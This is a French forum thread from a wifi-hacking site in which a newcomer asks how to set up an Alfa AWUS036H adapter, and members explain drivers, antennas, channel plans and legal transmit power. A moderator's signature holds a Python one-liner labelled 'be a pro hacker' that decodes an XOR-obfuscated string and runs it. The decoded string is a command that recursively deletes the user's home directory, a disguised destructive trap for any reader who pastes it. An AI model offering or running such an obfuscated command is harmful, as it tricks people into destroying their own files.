Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 18-11-2012 11:07:49

Pozzy38
N00b

Y a t il un Tuto pour les nuls pour AWUS 036H ?

Bonjour,

Je suis nouveau sur le site et débutant.
Grace aux informations recueillis sur le site, j'ai acheté recement une carte Wifi Awus036H, sur le site que la communauté recommande.

Le delais et l'envoi ont été supers, le probleme c'est qu'à la premiere utilisation, c'est un peu la pagaille.

D'ou ma question : existe t 'il un tuto ou bien un mode d'emploi en francais pour parametrer la carte wifi et obtenir une bonne reception ???

Merci à tous.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 18-11-2012 19:40:06

antares145
Membre d'honneur
Site Web

Re : Y a t il un Tuto pour les nuls pour AWUS 036H ?

Heu, tu veux quoi exactement ? Une formule magique et des incantations pour que tout fonctionne par magie, façon "danse de la pluie" virtuelle ?
Sérieusement, personne ne va s'amuser à faire un tuto "comment utiliser une carte WiFi" (l'Alfa n'est rien de plus), sinon on va jamais s'en sortir... Jusqu'où est-ce que ça va aller, un tuto sur l'utilisation du clavier ? big_smile

Accessoirement, tu ne donnes aucun détail sur ton problème, on est censés tout deviner tous seuls ? c'est quoi "la pagaille" ? Réception faible ? Surf lent ? Message d'erreur ? Ordi qui fume ? Attaque terroriste ? Fin du Monde ? (t'es un peu en avance alors, remarque)

Quel type de machine ? Windows, lequel ? 32, 64 bits ? Linux, lequel ? Machine virtuelle ? Quel pilote tu utilises ?

Donne nous un minimum d'infos sinon on ne pourra vraiment rien faire pour toi...

#3 18-11-2012 21:09:32

jlf
Membre Indétronable

ba ouai on ne sait pas ce que tu veu enfaite moi perso branché elle a marché direct apres j'ai chercher a optimisé donc un peut de recherche de bouinage

#4 19-11-2012 06:31:04

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Comment ça un tuto sur l'Alfa ? tu branches cet adaptateur est ça fonctionne c'est tout, via aussi son pilote et utilitaire (petit CD) permettant entre autre de visualiser les réseaux à porter d'antenne, etc. Tu peux aussi utiliser inSSIDer qui est un scanner Wifi qui donne plus d'informations précises. Après tu as la possibilité d'essayé d'autres antennes pour augmenter le gain (omnidirectionnelles, Yagi, panneaux) --> Comment bien choisir son antenne.

Ou bien si tu veux en bricoler soi-même:
--> Antenne Ricoré
--> Antenne Chocapic
--> Quelques antennes à faire soi-même

Antares, ta un assistant qui ne te quittes pas d'une semelle lol en plus n'est pas prêt de payer la taxe sur la ponctuation.

#5 19-11-2012 16:15:30

spawn
Modérateur

antares145 a écrit :

des incantations pour que tout fonctionne par magie, façon "danse de la pluie" virtuelle ?

Moi je veux bien une danse de la pluie \o/

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#6 19-11-2012 16:49:51

antares145
Membre d'honneur
Site Web

@spawn : \o\ |o| /o/ _o_ .o. 

raindance

Mais c'est bien parce que t'es modo hein...

@Fuji : c'est la génération SMS peut-être, on vire tout ce qui ne sert à rien (quoique...) roll pam

#7 23-11-2012 06:13:46

Pozzy38
N00b

Bonjour a tous, smile

Je vois que je n'ai pas été assez precis, pardonnez moi.

J'ai un pc sous windows XP. J'ai installé le logiciel fournit avec le cd d'installation ainsi que les drivers reconnus et certifiés par windows.

J'ai un menu assez simple avec peu de reglages, une fois le reseau identifier et choisi, il se connecte automatiquement.

Mais, et c'est la le but de ma question, sur le site du fabricant, j'ai telechargé le logiciel qui est plus complet avec possibilité de regler des % de dB. Et c'est la que je bute. sad

Y a t 'il des valeurs precises a mettre ?  Comment savoir quelle est la puissance de l'antenne (1mW ou bien plus faible), car il me semble que pour la France la puissance est limitée ? !

Avec les differents essais, je me suis rendu compte qu'il fallait que je reste sur la version CD (et donc la version simple), c'est ce qui fonctionne le mieux. smile

Ma premiere question était simple : comment gerer les parametres pour regler la puissance a son optimum ?

Maintenant je vais rester sur la version simple car ca marche a merveille. smile

Merci de vos remarques et à bientot.

#8 23-11-2012 09:36:40

jlf
Membre Indétronable

pour géré la puissance faut rester avec la version télécharger power control ensuite va dans onglet avancer et en plan de frquence indie FCC une fois cela fait elle est réglé pour etre a pleine puissance pour finir suffit de faire mumuse avec le tx power mais bon si tu capte bien avec le réglage a 100% sa sert a rien de le changer

#9 23-11-2012 10:27:57

antares145
Membre d'honneur
Site Web

Ah ben voilà, tu vois quand tu veux, là on y voit déjà plus clair smile

La puissance maximale est indiquée par le plan de fréquence utilisé (channel plan) :
- FCC correspond aux USA, canaux 1 à 11 et puissance maximale de 500 mW (tiens, curieux, je pensais que c'était 1000 mW)
- ETSI (ou "France") correspond à l'Europe, canaux 1 à 13 et puissance maximale de 100 mW
- Japan (devine à quoi il correspond tongue) utilise les canaux 1 à 14 avec 100 mW max

Donc si tu sélectionnes le bon plan de fréquence, tu ne risques pas d'être illégalement haut en puissance, même en mettant le curseur de TX Power à 100% smile Si ça fonctionne parfaitement avec le pilote "simple", tu n'as pas besoin d'adapter ta puissance, c'est uniquement en cas de mauvaise liaison qu'il est intéressant d'adapter cette dernière.

Si tu veux monter plus haut en puissance, il faut que tu changes de channel plan (au risque de perdre les canaux 12 et 13). Je pensais que "FCC" permettait de monter à 1000 mW, mais on dirait que ce n'est pas le cas (en tout cas sous Linux). La Bolivie est le seul pays pour lequel je suis sûr que la puissance légale est de 1000 mW max, mais il y en a sans doute d'autres wink

#10 23-11-2012 22:43:18

Pozzy38
N00b

Et bien merci pour cette reponse precise. big_smile
Du coup je vais rester en version simple, mais j'aurais au moins comblé des lacunes.

Merci  wink

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]